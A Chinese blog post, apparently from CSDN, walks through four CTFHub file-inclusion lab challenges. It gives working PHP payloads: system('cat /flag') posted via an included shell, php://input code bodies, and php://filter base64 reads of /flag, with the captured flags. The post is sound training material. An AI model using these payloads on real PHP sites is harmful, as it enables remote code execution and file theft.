CTFHUB-RCE-文件包含

最新推荐文章于 2024-08-08 16:00:00 发布
最新推荐文章于 2024-08-08 16:00:00 发布
阅读量426 收藏
点赞数
分类专栏: CTFHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014794539/article/details/118639228
版权
本文详细讲述了PHP中file和input伪协议的利用技巧,包括通过Hackbar构造Payload、抓包POST请求、filter协议解码和远程包含,最终演示如何在CTF挑战中成功获取flag。涉及知识点有shell执行、编码解码和安全防护措施的突破。
摘要由CSDN通过智能技术生成

考点
php伪协议 file协议
分析过程
在这里插入图片描述
Shell是这个
在这里插入图片描述

使用hackbar 构造Playload传参

http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txt

ctfhub=system('ls /');
ctfhub=system('cat /flag');

在这里插入图片描述
得到flag

ctfhub{3a551fa301f8dda0dccd2c7d}

php://input

考点
php伪协议 input协议
分析思路

抓包 把请求方式改成POST
开头POST /file=php://input HTTP/1.1
在这里插入图片描述
可以用 那没事了
playload

<?php system("ls /")?>
<?php system("cat /flag_21695")?>

在这里插入图片描述
得到flag

ctfhub{552db4f70a996a20ca7ae8ec}

读取源代码

考点
php伪协议中的filter协议
思路分析

他告诉了flag的位置
考虑使用filter协议
构造playload:

http://challenge-1b95d33e2212f9fb.sandbox.ctfhub.com:10800/?file=php://filter/read=convert.base64-encode/resource=/flag

在这里插入图片描述
解码

得到flag

ctfhub{e4be0c887bb918fc7e4c55c8}

远程包含

考点
伪协议 伪协议
思路分析
1
用file包含phpinfo是有回显的,所以构造
payload :

xxx:10080/?file=php://input
post <?php system('ls /');?>
<?php system('cat /flag');?>

在这里插入图片描述
在这里插入图片描述
得到flag

ctfhub{42c0e127f9a470f3f91d1eaa}
Pale1c
关注
专栏目录
CTFHubRCE文件包含
cx_sam的博客
08-07 1750
CTF WEB RCE 文件包含
CTFHUB-web-RCE
ookami6497的博客
12-03 1497
CTFHUB RCE——文件包含
winofkill的博客
12-11 6445
1.文件包含 首先我们开启题目 看到的是一大串代码 我们仔细看一下php代码,重点是 if(!strpos($_GET["file"],"flag")){ include$_GET["file"]; 这里有一个strpos(string,find,start)函数 意思在string字符串中找find的位置,start是查找的开始位置 那么这句代码的意思就是如果file中没有flag字符串就执行下面的include$_GET["file"] 否则...
CTFHUB-web-RCE-文件包含
最新发布
weixin_68416970的博客
08-08 312
发现此处应该有文件包含,结合源代码,构造 payload 发送 post 请求,可以查看到根目录有一个 flag文件。查看 flag文件发现了本题的 flag。点击下面的 shell 出现下面的页面。
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 725
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFHubRCE文件包含
m0_63563528的博客
02-03 638
文件包含漏洞的原理及利用、PHP伪协议
CTFHub技能书解题笔记-RCE-文件包含
qq_43006864的博客
01-28 3409
打开题目。 他需要一个shell.txt文件。这里尝试点击shell访问一下 看到了一句话。 这里我们直接再/shell.txt 后面进行post传参是没用的。 要进行文件包含,这里我们要将shell.txt进行构造。所以要用到?file=shell.txt。 再进行post传参, 成功传参, 成功拿到flag ...
CTFHUB-WEB-RCE
K_ShenH的博客
06-16 863
CTFHUB-WEB-RCE
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7197
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 1100
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
CTFHUB 文件包含 RCE
nai_kai的博客
06-17 5922
CTFHUB 文件包含 ctfhub RCE 文件包含 write up 审计一下代码,铁铁们可以百度一下strpos()的漏洞哦 #函数查找字符串在另一字符串中第一次出现的位置(区分大小写) strpos("You love php, I love php too!","php"); “我有一个shell,怎么用?” 这个是题目给的包含文件 #request = post + get 于是构造payload,往ctfhub里传参 http://challenge-2bfb323ac5bd651f
RCE文件包含漏洞
sGanYu
08-17 2225
文件包含 是指编译器进行预处理时复制指定的文件内容代替源文件中预处理命令的过程,一个源文件可以将另一个源文件的全部内容包含进来。初衷是为了减少程序代码的冗余。 文件包含漏洞原理 可以试想一下,开发人员如果每一个代码文件中都要使用到同一段代码,非常繁琐,所以通常会将用到的代码转换成一个文件,让每一个用到它的代码都包含在里面,而无需再次编写。这种调用文件的过程一般被称为包含文件。但由于这种灵活性,从而导致客户端可以调用任意恶意文件,从而造成文件包含漏洞。 文件 PHP 中的文件包含分为本地包含和远.
Linux常用命令精讲(基础命令介绍)
Chenwei的博文
11-17 1093
文章目录 目录文章目录一、Shell二、Linux命令的分类1.查看内部命令2.禁用内部命令三、Linux命令行格式四、编辑Linux命令行的辅助操作五、获得命令帮助的方法1.pwd——查看当前的工作目录2.cd——切换工作目录(1)相对路径表现形式六、ls——列表显示目录内容ls的常用选项七、长格式Linux命令2一、alias——设置别名二、du——统计目录及文件空间占用情况三、mkdir——创建新目录四、touch——创建空文件五、ln——创建链接文件1.链接文件类型六、cp——复制文件或目录七、rm
ctfhub-文件包含
m0_62094846的博客
12-13 300
这道题和之前做的文件包含题不大一样,包含了木马 官方的wp写的很清楚文件包含 | CTFHub GET一个file,用file包含的文件会直接出现在index.php中被当作php代码解析 那么,如果file=shell.txt,就可以把木马包含进文件里了 再用蚁剑就可以连接 ...
ctfhub文件包含
a666666688的博客
08-07 605
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
CTFHUB文件包含
2201_75447904的博客
04-04 727
但需要注意的是,由于安全原因,大多数浏览器对file://协议有一些限制,例如不允许跨域访问、限制JavaScript执行等,以防止恶意网站利用file://协议进行攻击。而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。: 如果GET参数'file'以"php://"开头,则直接包含用户指定的文件。
文件包含ctfhub
weixin_43326436的博客
08-06 843
1.进入以后,发现的是 应该可以看到是一段代码,strpos这个函数就是查找相同字符串的位置,在这里就是查找和flag相同的字符串的位置,在下面又发现了一个我又一个链接是shell.txt,怎么使用它吗。点进去链接又是一句php,请求ctfhub意思。 2.因为是文件包含,所以直接构造payload 将?shell.txt构造, 所以直接 看到这个图片,利用火狐中的hackbar postdata 输入 ctfhub=system(‘cat /flag’); (system意思就是输出并返回最后一个sh
CTFHub | 文件包含
尼泊罗河伯的博客
05-16 1299
简单分析网页显示内容中的源代码,可以发现一处代码include $_GET["file"] ,其中 include 语句可以动态地包含用户发送的GET 请求。详细的方法将在后续的内容中进行逐步解释。
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值